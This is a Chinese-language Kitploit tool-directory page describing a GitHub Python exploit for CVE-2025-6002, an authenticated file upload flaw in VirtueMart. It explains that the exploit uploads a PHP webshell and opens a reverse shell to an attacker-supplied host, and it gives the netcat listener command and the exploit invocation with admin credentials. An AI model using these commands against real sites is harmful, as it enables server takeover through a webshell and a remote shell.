Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-6002 — Python 针对 CVE-2025-6002 的漏洞利用程序,目标是 VirtueMart < 4.4.10 中经过身份验证的任意文件上传漏洞。该程序会登录系统、上传 PHP 网页后门,并触发反向 Shell 以进行渗透测试。 | Kitploit
工具/GitHubGitHub/schn1tzelme1ster/cve-2025-6002
Payload生成漏洞分析漏洞利用ShellcodeWeb应用程序漏洞利用渗透测试
GitHubschn1tzelme1ster/cve-2025-6002

CVE-2025-6002

Python 针对 CVE-2025-6002 的漏洞利用程序,目标是 VirtueMart < 4.4.10 中经过身份验证的任意文件上传漏洞。该程序会登录系统、上传 PHP 网页后门,并触发反向 Shell 以进行渗透测试。

查看仓库
5个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

针对 CVE-2025-6002 的漏洞利用

该脚本利用 VirtueMart < 4.4.10 中经过认证的任意文件上传漏洞(CVE-2025-6002),该漏洞在这篇博客文章中有所描述:https://blog.blacklanternsecurity.com/p/doomla-zero-days

该脚本使用给定的凭据登录 VirtueMart,创建一个新产品,并将一个 PHP webshell 作为媒体文件上传。随后,它会向所提供的 IP/端口发起一个反弹 shell。

参数:

  • --url: VirtueMart 的 URL
  • --username: 管理员用户名
  • --password: 管理员密码
  • --remote-ip: 攻击者 IP 地址https://github.com/schn1tzelme1ster/CVE-2025-6002/tree/main
  • --remote-port: 攻击者端口

用法:

  1. 在攻击者机器上运行 Netcat:
root@kitploit:~
nc -nlvp 1337
  1. 执行漏洞利用
root@kitploit:~
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337
下载工具